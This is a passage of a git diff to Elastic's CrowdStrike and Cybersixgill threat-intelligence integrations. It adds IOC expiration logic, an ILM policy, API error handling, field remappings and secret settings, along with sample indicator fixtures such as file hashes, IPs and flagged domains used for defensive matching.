"file": { - "hash": { - "sha256": "c98e192bf71a7f97563824cd448b47613743dcd1c853742b78f42b000192b83d" - } - }, "input": { "type": "cel" }, @@ -59,6 +54,11 @@ "threat": { "indicator": { "confidence": "High", + "file": { + "hash": { + "sha256": "c98e192bf71a7f97563824cd448b47613743dcd1c853742b78f42b000192b83d" + } + }, "name": "c98e192bf71a7f97563824cd448b47613743dcd1c853742b78f42b000192b83d", "provider": "crowdstrike", "type": "file" diff --git a/packages/ti_crowdstrike/data_stream/ioc/agent/stream/cel.yml.hbs b/packages/ti_crowdstrike/data_stream/ioc/agent/stream/cel.yml.hbs index b4bec150a96..2a21ce7836b 100644 --- a/packages/ti_crowdstrike/data_stream/ioc/agent/stream/cel.yml.hbs +++ b/packages/ti_crowdstrike/data_stream/ioc/agent/stream/cel.yml.hbs @@ -47,47 +47,66 @@ program: | : '"' )) - ).do_request().as(resp, bytes(resp.Body).decode_json().as(body, { - "events": body.resources.map(e, { - "message": e.encode_json(), - }), - "want_more": has(body.meta.pagination) && (int(state.offset) + body.resources.size()) < body.meta.pagination.total, - "offset": has(body.meta.pagination) && ((int(state.offset) + body.resources.size()) < body.meta.pagination.total) ? - int(state.offset) + int(body.resources.size()) - : - 0, - "url": state.url, - "batch_size": state.batch_size, - "cursor": { - "last_timestamp": ( - has(body.resources) && body.resources.size() > 0 ? - ( - has(state.cursor) && has(state.cursor.last_timestamp) && body.resources.map(e, e.modified_on).max() < state.cursor.last_timestamp ? - state.cursor.last_timestamp - : - body.resources.map(e, e.modified_on).max() - ) + ).do_request().as(resp, + resp.StatusCode == 200 ? + bytes(resp.Body).decode_json().as(body, { + "events": body.resources.map(e, { + "message": e.encode_json(), + }), + "want_more": has(body.meta.pagination) && (int(state.offset) + body.resources.size()) < body.meta.pagination.total, + "offset": has(body.meta.pagination) && ((int(state.offset) + body.resources.size()) < body.meta.pagination.total) ? + int(state.offset) + int(body.resources.size()) : - ( - has(state.cursor) && has(state.cursor.last_timestamp) ? - state.cursor.last_timestamp + 0, + "url": state.url, + "batch_size": state.batch_size, + "initial_interval": state.initial_interval, + "cursor": { + "last_timestamp": ( + has(body.resources) && body.resources.size() > 0 ? + ( + has(state.cursor) && has(state.cursor.last_timestamp) && body.resources.map(e, e.modified_on).max() < state.cursor.last_timestamp ? + state.cursor.last_timestamp + : + body.resources.map(e, e.modified_on).max() + ) : - null - ) - ), - "first_timestamp": ( - has(state.cursor) && has(state.cursor.first_timestamp) && state.cursor.first_timestamp != null ? - ( - state.want_more ? - state.cursor.first_timestamp + ( + has(state.cursor) && has(state.cursor.last_timestamp) ? + state.cursor.last_timestamp + : + null + ) + ), + "first_timestamp": ( + has(state.cursor) && has(state.cursor.first_timestamp) && state.cursor.first_timestamp != null ? + ( + state.want_more ? + state.cursor.first_timestamp + : + state.cursor.last_timestamp + ) : - state.cursor.last_timestamp - ) - : - (now - duration(state.initial_interval)).format(time_layout.RFC3339) - ), - }, - })) + (now - duration(state.initial_interval)).format(time_layout.RFC3339) + ), + }, + }) + : + { + "events": { + "error": { + "code": string(resp.StatusCode), + "id": string(resp.Status), + "message": string(resp.Body) + }, + }, + "want_more": false, + "offset": 0, + "url": state.url, + "batch_size": state.batch_size, + "initial_interval": state.initial_interval, + } + ) tags: {{#if preserve_original_event}} - preserve_original_event diff --git a/packages/ti_crowdstrike/data_stream/ioc/sample_event.json b/packages/ti_crowdstrike/data_stream/ioc/sample_event.json index fb5f554f9d7..b6ce8f6728e 100644 --- a/packages/ti_crowdstrike/data_stream/ioc/sample_event.json +++ b/packages/ti_crowdstrike/data_stream/ioc/sample_event.json @@ -1,11 +1,11 @@ { "@timestamp": "2023-11-01T10:22:23.106Z", "agent": { - "ephemeral_id": "1a68a49b-98f5-4aee-adf5-df243cdb4637", - "id": "3ac65ec0-d6ad-4ccb-ae51-f7d6cbd54eff", + "ephemeral_id": "ca4c5a70-0aa1-4cb3-867c-3c099798eef4", + "id": "803f2aef-a6c1-47c8-b64d-e484bb967db4", "name": "docker-fleet-agent", "type": "filebeat", - "version": "8.11.0" + "version": "8.12.0" }, "data_stream": { "dataset": "ti_crowdstrike.ioc", @@ -16,9 +16,9 @@ "version": "8.11.0" }, "elastic_agent": { - "id": "3ac65ec0-d6ad-4ccb-ae51-f7d6cbd54eff", + "id": "803f2aef-a6c1-47c8-b64d-e484bb967db4", "snapshot": false, - "version": "8.11.0" + "version": "8.12.0" }, "event": { "action": "detect-again", @@ -28,7 +28,7 @@ ], "dataset": "ti_crowdstrike.ioc", "id": "34874a88935860cf6yyfc856d6abb6f35a29d8c077195ed6291aa8373696b44", - "ingested": "2024-01-11T11:54:47Z", + "ingested": "2024-03-28T10:50:10Z", "kind": "enrichment", "original": "{\"action\":\"detect again\",\"applied_globally\":true,\"created_by\":\"abc.it@example.com\",\"created_on\":\"2023-11-01T10:22:23.10607613Z\",\"deleted\":false,\"description\":\"IS-38887\",\"expired\":false,\"from_parent\":false,\"id\":\"34874a88935860cf6yyfc856d6abb6f35a29d8c077195ed6291aa8373696b44\",\"metadata\":{\"filename\":\"High_Serverity_Heuristic_Sandbox_Threat.docx\"},\"modified_by\":\"example.it@ex.com\",\"modified_on\":\"2023-11-01T10:22:23.10607613Z\",\"platforms\":[\"windows\",\"mac\",\"linux\"],\"severity\":\"critical\",\"tags\":[\"IS-38887\"],\"type\":\"ipv4\",\"value\":\"81.2.69.192\"}", "type": [ diff --git a/packages/ti_crowdstrike/docs/README.md b/packages/ti_crowdstrike/docs/README.md index e1fd02bada6..3852df59040 100644 --- a/packages/ti_crowdstrike/docs/README.md +++ b/packages/ti_crowdstrike/docs/README.md @@ -46,6 +46,16 @@ This module has been tested against the **CrowdStrike Falcon Intelligence API Ve 2. Client Secret 3. Token url 4. API Endpoint url +5. Required scopes for each data stream : + + | Data Stream | Scope | + | ------------- | ------------- | + | Intel | read:intel | + | IOC | read:iocs | + +Follow the [documentation](https://www.crowdstrike.com/blog/tech-center/consume-ioc-and-threat-feeds/) for enabling the scopes from the CrowdStrike console. + +User should either have `admin` role or `Detection Exception Manager` role to access IOCs endpoint. Follow the [documentation](https://falcon.crowdstrike.com/documentation/page/f20650df/default-roles-reference) for managing user roles and permissions. ### Enabling the integration in Elastic: @@ -85,11 +95,11 @@ An example event for `intel` looks as following: { "@timestamp": "2023-11-21T06:16:01.000Z", "agent": { - "ephemeral_id": "91894e79-85f9-4358-897b-3e25722c7277", - "id": "3ac65ec0-d6ad-4ccb-ae51-f7d6cbd54eff", + "ephemeral_id": "ee250a38-ef6d-486c-a245-6d0dd0785a11", + "id": "803f2aef-a6c1-47c8-b64d-e484bb967db4", "name": "docker-fleet-agent", "type": "filebeat", - "version": "8.11.0" + "version": "8.12.0" }, "data_stream": { "dataset": "ti_crowdstrike.intel", @@ -100,9 +110,9 @@ An example event for `intel` looks as following: "version": "8.11.0" }, "elastic_agent": { - "id": "3ac65ec0-d6ad-4ccb-ae51-f7d6cbd54eff", + "id": "803f2aef-a6c1-47c8-b64d-e484bb967db4", "snapshot": false, - "version": "8.11.0" + "version": "8.12.0" }, "event": { "agent_id_status": "verified", @@ -111,18 +121,13 @@ An example event for `intel` looks as following: ], "dataset": "ti_crowdstrike.intel", "id": "hash_sha256_c98e1a7f563824cd448b47613743dcd1c853742b78f42b000192b83d", - "ingested": "2024-01-11T11:53:46Z", + "ingested": "2024-03-28T10:49:11Z", "kind": "enrichment", "original": "{\"_marker\":\"17005473618d17ae6353d123235e4158c5c81f25f0\",\"actors\":[\"SALTYSPIDER\"],\"deleted\":false,\"domain_types\":[\"abc.com\"],\"id\":\"hash_sha256_c98e1a7f563824cd448b47613743dcd1c853742b78f42b000192b83d\",\"indicator\":\"c98e192bf71a7f97563824cd448b47613743dcd1c853742b78f42b000192b83d\",\"ip_address_types\":[\"81.2.69.192\"],\"kill_chains\":[\"Installation\",\"C2\"],\"labels\":[{\"created_on\":1700547356,\"last_valid_on\":1700547360,\"name\":\"MaliciousConfidence/High\"},{\"created_on\":1700547359,\"last_valid_on\":1700547359,\"name\":\"Malware/Mofksys\"},{\"created_on\":1700547359,\"last_valid_on\":1700547359,\"name\":\"ThreatType/Commodity\"},{\"created_on\":1700547359,\"last_valid_on\":1700547359,\"name\":\"ThreatType/CredentialHarvesting\"},{\"created_on\":1700547359,\"last_valid_on\":1700547359,\"name\":\"ThreatType/InformationStealer\"}],\"last_updated\":1700547361,\"malicious_confidence\":\"high\",\"malware_families\":[\"Mofksys\"],\"published_date\":1700547356,\"relations\":[{\"created_date\":1700547339,\"id\":\"domain.com.yy\",\"indicator\":\"domain.ds\",\"last_valid_date\":1700547339,\"type\":\"domain\"},{\"created_date\":1700547339,\"id\":\"domain.xx.yy\",\"indicator\":\"domain.xx.fd\",\"last_valid_date\":1700547339,\"type\":\"domain\"}],\"reports\":[\"reports\"],\"targets\":[\"abc\"],\"threat_types\":[\"Commodity\",\"CredentialHarvesting\",\"InformationStealer\"],\"type\":\"hash_sha256\",\"vulnerabilities\":[\"vuln\"]}", "type": [ "indicator" ] }, - "file": { - "hash": { - "sha256": "c98e192bf71a7f97563824cd448b47613743dcd1c853742b78f42b000192b83d" - } - }, "input": { "type": "cel" }, @@ -143,6 +148,11 @@ An example event for `intel` looks as following: "threat": { "indicator": { "confidence": "High", + "file": { + "hash": { + "sha256": "c98e192bf71a7f97563824cd448b47613743dcd1c853742b78f42b000192b83d" + } + }, "name": "c98e192bf71a7f97563824cd448b47613743dcd1c853742b78f42b000192b83d", "provider": "crowdstrike", "type": "file" @@ -265,7 +275,7 @@ An example event for `intel` looks as following: | ti_crowdstrike.intel.domain_types | Information related to domain types associated with the Intel Indicator. | keyword | | ti_crowdstrike.intel.expiration_duration | | keyword | | ti_crowdstrike.intel.id | A unique identifier for the Intel Indicator. | keyword | -| ti_crowdstrike.intel.ip_address_types | Information related to IP address types associated with the Intel Indicator. | ip | +| ti_crowdstrike.intel.ip_address_types | Information related to IP address types associated with the Intel Indicator. | keyword | | ti_crowdstrike.intel.kill_chains | Information related to kill chains associated with the Intel Indicator. | keyword | | ti_crowdstrike.intel.labels.created_on | Timestamp indicating when the labels were created. | date | | ti_crowdstrike.intel.labels.last_valid_on | Timestamp indicating when the labels were last valid. | date | @@ -299,11 +309,11 @@ An example event for `ioc` looks as following: { "@timestamp": "2023-11-01T10:22:23.106Z", "agent": { - "ephemeral_id": "1a68a49b-98f5-4aee-adf5-df243cdb4637", - "id": "3ac65ec0-d6ad-4ccb-ae51-f7d6cbd54eff", + "ephemeral_id": "ca4c5a70-0aa1-4cb3-867c-3c099798eef4", + "id": "803f2aef-a6c1-47c8-b64d-e484bb967db4", "name": "docker-fleet-agent", "type": "filebeat", - "version": "8.11.0" + "version": "8.12.0" }, "data_stream": { "dataset": "ti_crowdstrike.ioc", @@ -314,9 +324,9 @@ An example event for `ioc` looks as following: "version": "8.11.0" }, "elastic_agent": { - "id": "3ac65ec0-d6ad-4ccb-ae51-f7d6cbd54eff", + "id": "803f2aef-a6c1-47c8-b64d-e484bb967db4", "snapshot": false, - "version": "8.11.0" + "version": "8.12.0" }, "event": { "action": "detect-again", @@ -326,7 +336,7 @@ An example event for `ioc` looks as following: ], "dataset": "ti_crowdstrike.ioc", "id": "34874a88935860cf6yyfc856d6abb6f35a29d8c077195ed6291aa8373696b44", - "ingested": "2024-01-11T11:54:47Z", + "ingested": "2024-03-28T10:50:10Z", "kind": "enrichment", "original": "{\"action\":\"detect again\",\"applied_globally\":true,\"created_by\":\"abc.it@example.com\",\"created_on\":\"2023-11-01T10:22:23.10607613Z\",\"deleted\":false,\"description\":\"IS-38887\",\"expired\":false,\"from_parent\":false,\"id\":\"34874a88935860cf6yyfc856d6abb6f35a29d8c077195ed6291aa8373696b44\",\"metadata\":{\"filename\":\"High_Serverity_Heuristic_Sandbox_Threat.docx\"},\"modified_by\":\"example.it@ex.com\",\"modified_on\":\"2023-11-01T10:22:23.10607613Z\",\"platforms\":[\"windows\",\"mac\",\"linux\"],\"severity\":\"critical\",\"tags\":[\"IS-38887\"],\"type\":\"ipv4\",\"value\":\"81.2.69.192\"}", "type": [ diff --git a/packages/ti_crowdstrike/elasticsearch/transform/latest_intel/fields/ecs.yml b/packages/ti_crowdstrike/elasticsearch/transform/latest_intel/fields/ecs.yml index f49d1f833b9..213b4dccd99 100644 --- a/packages/ti_crowdstrike/elasticsearch/transform/latest_intel/fields/ecs.yml +++ b/packages/ti_crowdstrike/elasticsearch/transform/latest_intel/fields/ecs.yml @@ -12,10 +12,6 @@ type: keyword - name: event.type type: keyword -- name: file.hash.md5 - type: keyword -- name: file.hash.sha256 - type: keyword - name: related.hash type: keyword - name: related.ip @@ -24,6 +20,12 @@ type: keyword - name: threat.indicator.confidence type: keyword +- name: threat.indicator.file.hash.md5 + type: keyword +- name: threat.indicator.file.hash.sha1 + type: keyword +- name: threat.indicator.file.hash.sha256 + type: keyword - name: threat.indicator.ip type: ip - name: threat.indicator.name @@ -32,5 +34,7 @@ type: keyword - name: threat.indicator.type type: keyword +- name: threat.indicator.url.full + type: keyword - name: vulnerability.category type: keyword diff --git a/packages/ti_crowdstrike/elasticsearch/transform/latest_intel/fields/fields.yml b/packages/ti_crowdstrike/elasticsearch/transform/latest_intel/fields/fields.yml index e7cc8b2e6aa..58d29ee64b6 100644 --- a/packages/ti_crowdstrike/elasticsearch/transform/latest_intel/fields/fields.yml +++ b/packages/ti_crowdstrike/elasticsearch/transform/latest_intel/fields/fields.yml @@ -22,7 +22,7 @@ type: keyword description: A unique identifier for the Intel Indicator. - name: ip_address_types - type: ip + type: keyword description: Information related to IP address types associated with the Intel Indicator. - name: kill_chains type: keyword diff --git a/packages/ti_crowdstrike/manifest.yml b/packages/ti_crowdstrike/manifest.yml index 6c404008d54..3579031ea78 100644 --- a/packages/ti_crowdstrike/manifest.yml +++ b/packages/ti_crowdstrike/manifest.yml @@ -1,7 +1,7 @@ -format_version: 3.0.0 +format_version: 3.0.3 name: ti_crowdstrike title: CrowdStrike Falcon Intelligence -version: 0.1.2 +version: 0.5.4 description: Collect logs from CrowdStrike Falcon Intelligence with Elastic Agent. type: integration categories: @@ -9,7 +9,7 @@ categories: - threat_intel conditions: kibana: - version: ^8.11.0 + version: ^8.12.0 elastic: subscription: basic screenshots: @@ -49,6 +49,7 @@ policy_templates: multi: false required: true show_user: true + secret: true - name: url type: text title: URL @@ -62,6 +63,7 @@ policy_templates: description: Token URL of CrowdStrike Falcon Intelligence. default: https://api.crowdstrike.com/oauth2/token required: true + secret: false show_user: false - name: proxy_url type: text diff --git a/packages/ti_cybersixgill/_dev/build/docs/README.md b/packages/ti_cybersixgill/_dev/build/docs/README.md index f49f11d1ba9..0b54853de5e 100644 --- a/packages/ti_cybersixgill/_dev/build/docs/README.md +++ b/packages/ti_cybersixgill/_dev/build/docs/README.md @@ -8,6 +8,12 @@ This integration connects with the commercial [Cybersixgill Darkfeed](https://ww The Cybersixgill Darkfeed integration collects threat intelligence from the Darkfeed TAXII service available using the credentials provided from Cybersixgill. +#### Expiration of Indicators of Compromise (IOCs) +The ingested IOCs are expired after the duration configured by `IOC Expiration Duration` integration setting. An [Elastic Transform](https://www.elastic.co/guide/en/elasticsearch/reference/current/transforms.html) is created to faciliate only active IOCs be available to the end users. This transform creates destination indices named `logs-ti_cybersixgill_latest.dest_threat-*` which only contains active and unexpired IOCs. The latest destination index also has an alias named `logs-ti_cybersixgill_latest.threat`. When querying for active indicators or setting up indicator match rules, only use the latest destination indices or the alias to avoid false positives from expired IOCs. Dashboards are also pointing to the latest destination indices containing active IOC. Please read [ILM Policy](#ilm-policy) below which is added to avoid unbounded growth on source datastream `.ds-logs-ti_cybersixgill.threat-*` indices. + +#### ILM Policy +To facilitate IOC expiration, source datastream-backed indices `.ds-logs-ti_cybersixgill.threat-*` are allowed to contain duplicates from each polling interval. ILM policy `logs-ti_cybersixgill.threat-default_policy` is added to these source indices so it doesn't lead to unbounded growth. This means data in these source indices will be deleted after `5 days` from ingested date. + {{fields "threat"}} {{event "threat"}} \ No newline at end of file diff --git a/packages/ti_cybersixgill/_dev/deploy/docker/files/config.yml b/packages/ti_cybersixgill/_dev/deploy/docker/files/config.yml index 32762a590d9..2bd3cc75a09 100644 --- a/packages/ti_cybersixgill/_dev/deploy/docker/files/config.yml +++ b/packages/ti_cybersixgill/_dev/deploy/docker/files/config.yml @@ -99,6 +99,51 @@ rules: "type": "indicator", "valid_from": "2021-12-07T22:43:29Z" }, + { + "confidence": 80, + "created": "2024-03-10T13:58:01.596Z", + "description": "Hash attributed to malware that was discovered in the dark and deep web", + "extensions": { + "extension-definition--3de9ff00-174d-4d41-87c9-05a27a7e117c": { + "extension_type": "toplevel-property-extension" + } + }, + "external_references": [ + { + "positive_rate": "medium", + "source_name": "VirusTotal", + "url": "https://virustotal.com/#/file/7bdf8b8594ec269da864ee662334f4da53d4820a3f0f8aa665a0fa096ca8f220" + }, + { + "description": "Mitre attack tactics and technique reference", + "mitre_attack_tactic": "Build Capabilities", + "mitre_attack_tactic_id": "TA0024", + "mitre_attack_tactic_url": "https://attack.mitre.org/tactics/TA0024/", + "source_name": "mitre-attack" + } + ], + "id": "indicator--302dab0f-64dc-42f5-b99e-702b28c1aaa0", + "indicator_types": [ + "malicious-activity" + ], + "lang": "en", + "modified": "2024-03-10T15:58:01.596Z", + "name": "4d0f21919d623bd1631ee15ca7429f20;5ce39ef0700b64bd0c71b55caf64ae45d8400960;7bdf8b8594ec269da864ee662334f4da53d4820a3f0f8aa665a0fa096ca8f220", + "pattern": "[file:hashes.MD5 = '4d0f21919d623bd1631ee15ca7429f20' OR file:hashes.'SHA-1' = '5ce39ef0700b64bd0c71b55caf64ae45d8400960' OR file:hashes.'SHA-256' = '7bdf8b8594ec269da864ee662334f4da53d4820a3f0f8aa665a0fa096ca8f220']", + "pattern_type": "stix", + "sixgill_actor": "vaedzy", + "sixgill_confidence": 80, + "sixgill_feedid": "darkfeed_012", + "sixgill_feedname": "dark_web_hashes", + "sixgill_post_virustotallink": "https://virustotal.com/#/file/7bdf8b8594ec269da864ee662334f4da53d4820a3f0f8aa665a0fa096ca8f220", + "sixgill_postid": "c0c9a0085fb5281cfb40a0ddb62e1d2c6a53eb7a", + "sixgill_posttitle": "[病毒样本] #Trickbot (2021-12-07)", + "sixgill_severity": 70, + "sixgill_source": "forum_kafan", + "spec_version": "2.1", + "type": "indicator", + "valid_from": "2024-03-07T02:55:17Z" + }, { "confidence": 70, "created": "2021-12-07T13:58:01.596Z", diff --git a/packages/ti_cybersixgill/changelog.yml b/packages/ti_cybersixgill/changelog.yml index 0e57435ece3..b06ea20fa41 100644 --- a/packages/ti_cybersixgill/changelog.yml +++ b/packages/ti_cybersixgill/changelog.yml @@ -1,4 +1,14 @@ # newer versions go on top +- version: "1.27.0" + changes: + - description: Add support for IOC expiration. + type: enhancement + link: https://github.com/elastic/integrations/pull/9374 +- version: "1.26.0" + changes: + - description: Set sensitive values as secret. + type: enhancement + link: https://github.com/elastic/integrations/pull/9129 - version: "1.25.1" changes: - description: Changed owners diff --git a/packages/ti_cybersixgill/data_stream/threat/_dev/test/pipeline/test-common-config.yml b/packages/ti_cybersixgill/data_stream/threat/_dev/test/pipeline/test-common-config.yml index 4da22641654..2c7449ef783 100644 --- a/packages/ti_cybersixgill/data_stream/threat/_dev/test/pipeline/test-common-config.yml +++ b/packages/ti_cybersixgill/data_stream/threat/_dev/test/pipeline/test-common-config.yml @@ -1,3 +1,5 @@ fields: tags: - preserve_original_event + _conf: + ioc_expiration_duration: 5d diff --git a/packages/ti_cybersixgill/data_stream/threat/_dev/test/pipeline/test-cybersixgill-ndjson.log-expected.json b/packages/ti_cybersixgill/data_stream/threat/_dev/test/pipeline/test-cybersixgill-ndjson.log-expected.json index 09ea0089d7b..3a6aeeb9b57 100644 --- a/packages/ti_cybersixgill/data_stream/threat/_dev/test/pipeline/test-cybersixgill-ndjson.log-expected.json +++ b/packages/ti_cybersixgill/data_stream/threat/_dev/test/pipeline/test-cybersixgill-ndjson.log-expected.json @@ -4,6 +4,8 @@ "@timestamp": "2021-12-07T09:22:41.485Z", "cybersixgill": { "actor": "layna61524", + "deleted_at": "2021-12-12T09:22:41.485Z", + "expiration_duration": "5d", "feedname": "darkweb_vt_links", "mitre": { "description": "Mitre attack tactics and technique reference" @@ -42,6 +44,7 @@ }, "first_seen": "2021-12-07T00:03:00.000Z", "last_seen": "2021-12-07T09:22:41.485Z", + "name": "2e7e43be1fc3cbefef8d686ce63ceb30456a4a67d555407fb6797e969972945c", "provider": "forum_bestblackhat", "reference": "https://portal.cybersixgill.com/#/search?q=_id:a452593da2f6314c2f2d6c98c6473608e11914e3", "type": "file" @@ -63,6 +66,8 @@ "@timestamp": "2021-12-07T18:04:26.451Z", "cybersixgill": { "actor": "CoinProject.info", + "deleted_at": "2021-12-12T18:04:26.451Z", + "expiration_duration": "5d", "feedname": "malware_download_urls", "mitre": { "description": "Mitre attack tactics and technique reference" @@ -91,6 +96,7 @@ "description": "Malware available for download from file-sharing sites", "first_seen": "2021-12-07T14:52:00.000Z", "last_seen": "2021-12-07T18:04:26.451Z", + "name": "https://ru.scribd.com/user/456422024/ForkLog#from_embed", "provider": "forum_hyipinvest", "reference": "https://portal.cybersixgill.com/#/search?q=_id:3f8c56e4cf6407ee7608e0f605503cb1e3fcedb9", "type": "url", @@ -119,6 +125,8 @@ "@timestamp": "2021-12-07T21:24:50.350Z", "cybersixgill": { "actor": "Admin", + "deleted_at": "2021-12-12T21:24:50.350Z", + "expiration_duration": "5d", "feedname": "dark_web_hashes", "mitre": { "description": "Mitre attack tactics and technique reference" @@ -152,6 +160,7 @@ }, "first_seen": "2021-12-07T21:23:33.000Z", "last_seen": "2021-12-07T21:24:50.350Z", + "name": "1dce6f3ba4a8d355df21a17584c514697ee0c37b51ab5657bc5b3a297b65955f", "provider": "blog_hackdig", "reference": "https://portal.cybersixgill.com/#/search?q=_id:c550f74ba76c0b2c9c46b0577f551ba5ef855813", "type": "file" @@ -173,6 +182,8 @@ "@timestamp": "2021-12-07T22:48:59.141Z", "cybersixgill": { "actor": "enginewo", + "deleted_at": "2021-12-12T22:48:59.141Z", + "expiration_duration": "5d", "feedname": "compromised_sites", "mitre": { "description": "Mitre attack tactics and technique reference" @@ -201,6 +212,7 @@ "description": "Shell access to this domain is being sold on dark web markets", "first_seen": "2021-12-07T22:43:29.000Z", "last_seen": "2021-12-07T22:48:59.141Z", + "name": "sdbpibandung.sch.id", "provider": "market_magbo", "reference": "https://portal.cybersixgill.com/#/search?q=_id:955f5379c2828ce483b74a671e498a5f69f9ea36", "type": "domain-name", diff --git a/packages/ti_cybersixgill/data_stream/threat/_dev/test/system/test-httpjson-config.yml b/packages/ti_cybersixgill/data_stream/threat/_dev/test/system/test-httpjson-config.yml index 3838cb93d9a..e8cf3d861b4 100644 --- a/packages/ti_cybersixgill/data_stream/threat/_dev/test/system/test-httpjson-config.yml +++ b/packages/ti_cybersixgill/data_stream/threat/_dev/test/system/test-httpjson-config.yml @@ -9,3 +9,6 @@ data_stream: url: http://{{Hostname}}:{{Port}}/taxii/sixgill-taxii/collections/102/objects interval: 30s enable_request_tracer: true + ioc_expiration_duration: 10d +assert: + hit_count: 4 diff --git a/packages/ti_cybersixgill/data_stream/threat/agent/stream/httpjson.yml.hbs b/packages/ti_cybersixgill/data_stream/threat/agent/stream/httpjson.yml.hbs index 2bea32e7bbb..96dc6124174 100644 --- a/packages/ti_cybersixgill/data_stream/threat/agent/stream/httpjson.yml.hbs +++ b/packages/ti_cybersixgill/data_stream/threat/agent/stream/httpjson.yml.hbs @@ -50,6 +50,13 @@ cursor: timestamp: value: '[[ .last_response.header.Get "X-TAXII-Date-Added-Last" ]]' +{{#if ioc_expiration_duration}} +fields_under_root: true +fields: + _conf: + ioc_expiration_duration: "{{ioc_expiration_duration}}" +{{/if}} + tags: {{#if preserve_original_event}} - preserve_original_event diff --git a/packages/ti_cybersixgill/data_stream/threat/elasticsearch/ilm/default_policy.json b/packages/ti_cybersixgill/data_stream/threat/elasticsearch/ilm/default_policy.json new file mode 100644 index 00000000000..ec3f7c9942e --- /dev/null +++ b/packages/ti_cybersixgill/data_stream/threat/elasticsearch/ilm/default_policy.json @@ -0,0 +1,23 @@ +{ + "policy": { + "phases": { + "hot": { + "actions": { + "rollover": { + "max_age": "1d", + "max_size": "50gb" + }, + "set_priority": { + "priority": 100 + } + } + }, + "delete": { + "min_age": "4d", + "actions": { + "delete": {} + } + } + } + } +} \ No newline at end of file diff --git a/packages/ti_cybersixgill/data_stream/threat/elasticsearch/ingest_pipeline/default.yml b/packages/ti_cybersixgill/data_stream/threat/elasticsearch/ingest_pipeline/default.yml index b8efd57a20f..585d4e80769 100644 --- a/packages/ti_cybersixgill/data_stream/threat/elasticsearch/ingest_pipeline/default.yml +++ b/packages/ti_cybersixgill/data_stream/threat/elasticsearch/ingest_pipeline/default.yml @@ -27,11 +27,6 @@ processors: ignore_missing: true - drop: if: ctx?.cybersixgill?.type != "indicator" - - fingerprint: - fields: - - cybersixgill.id - target_field: "_id" - ignore_missing: true ##################### # Threat ECS Fields # ##################### @@ -74,6 +69,13 @@ processors: - "yyyy-MM-dd'T'HH:mm:ss.SSSz" - "yyyy-MM-dd'T'HH:mm:ss.SSSZ" if: "ctx.cybersixgill?.valid_from != null" + - fingerprint: + fields: + - cybersixgill.id + - cybersixgill.created + - cybersixgill.modified + target_field: "_id" + ignore_missing: true - grok: field: cybersixgill.pattern patterns: @@ -106,6 +108,22 @@ processors: value: "{{_ingest._value}}" override: false ignore_missing: true + - set: + field: threat.indicator.name + value: '{{_temp_.threatvalue}}' + ignore_empty_value: true + - set: + field: threat.indicator.name + copy_from: threat.indicator.file.hash.md5 + ignore_empty_value: true + - set: + field: threat.indicator.name + copy_from: threat.indicator.file.hash.sha1 + ignore_empty_value: true + - set: + field: threat.indicator.name + copy_from: threat.indicator.file.hash.sha256 + ignore_empty_value: true - rename: field: _temp_.threatvalue target_field: threat.indicator.ip @@ -168,6 +186,59 @@ processors: type: integer target_field: threat.indicator.confidence ignore_missing: true + - script: + lang: painless + tag: script-default-deleted_at + if: ctx.cybersixgill?.deleted_at == null && ctx._conf?.ioc_expiration_duration != null && ctx._conf.ioc_expiration_duration != '' + description: Indicator Expiration is done after `_conf.ioc_expiration_duration` (default 90d) since its creation time. This script adds a default `cybersixgill.indicator.deleted_at` field to allow indicator expiration. + source: > + def dur = ctx._conf.ioc_expiration_duration; + ZonedDateTime _tmp_deleted_at; + ZonedDateTime _tmp_created_at = ZonedDateTime.parse(ctx.cybersixgill.created); + if (dur instanceof String){ + String time_unit = dur.substring(dur.length() - 1, dur.length()); + String time_value = dur.substring(0, dur.length() - 1); + if (time_unit == 'd') { + _tmp_deleted_at = _tmp_created_at.plusDays(Long.parseLong(time_value)); + } else if (time_unit == 'h') { + _tmp_deleted_at = _tmp_created_at.plusHours(Long.parseLong(time_value)); + } else if (time_unit == 'm') { + _tmp_deleted_at = _tmp_created_at.plusMinutes(Long.parseLong(time_value)); + } else { + _tmp_deleted_at = _tmp_created_at.plusDays(90L); + if (ctx.error == null) { + ctx.error = new HashMap(); + } + if (ctx.error.message == null) { + ctx.error.message = new ArrayList(); + } + ctx.error.message.add('invalid ioc_expiration_duration: using default 90 days'); + } + ctx.cybersixgill.deleted_at = _tmp_deleted_at; + } + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - date: + field: cybersixgill.deleted_at + tag: date_deleted_at + target_field: cybersixgill.deleted_at + formats: + - ISO8601 + - UNIX + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - fail: + description: 'If this date processor fails, it leads to transform errors, hence failing the document for investigation.' + message: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed' + - rename: + field: _conf.ioc_expiration_duration + tag: rename_conf_ioc_expiration_duration + target_field: cybersixgill.expiration_duration + ignore_missing: true - script: lang: painless if: ctx.cybersixgill?.external_references != null @@ -280,6 +351,7 @@ processors: - cybersixgill.sixgill_feedid - cybersixgill.sixgill_post_virustotallink - cybersixgill.type + - _conf ignore_missing: true on_failure: - set: diff --git a/packages/ti_cybersixgill/data_stream/threat/fields/ecs.yml b/packages/ti_cybersixgill/data_stream/threat/fields/ecs.yml index 7e4da707181..022139ab678 100644 --- a/packages/ti_cybersixgill/data_stream/threat/fields/ecs.yml +++ b/packages/ti_cybersixgill/data_stream/threat/fields/ecs.yml @@ -60,3 +60,10 @@ name: threat.tactic.id - external: ecs name: threat.tactic.reference +# Manually define this as a workaround for failing tests and validation +- name: threat.indicator.name + level: extended + type: keyword + description: The display name indicator in an UI friendly format +- external: ecs + name: labels diff --git a/packages/ti_cybersixgill/data_stream/threat/fields/fields.yml b/packages/ti_cybersixgill/data_stream/threat/fields/fields.yml index d61ac6c9e9f..15a570d3c31 100644 --- a/packages/ti_cybersixgill/data_stream/threat/fields/fields.yml +++ b/packages/ti_cybersixgill/data_stream/threat/fields/fields.yml @@ -29,3 +29,15 @@ type: keyword description: | The mitre description of the indicator + - name: deleted_at + type: date + description: | + The timestamp when indicator is (or will be) expired. + - name: expiration_duration + type: keyword + description: | + The configured expiration duration. +- name: labels.is_ioc_transform_source + type: constant_keyword + value: "true" + description: Field indicating if its the transform source for 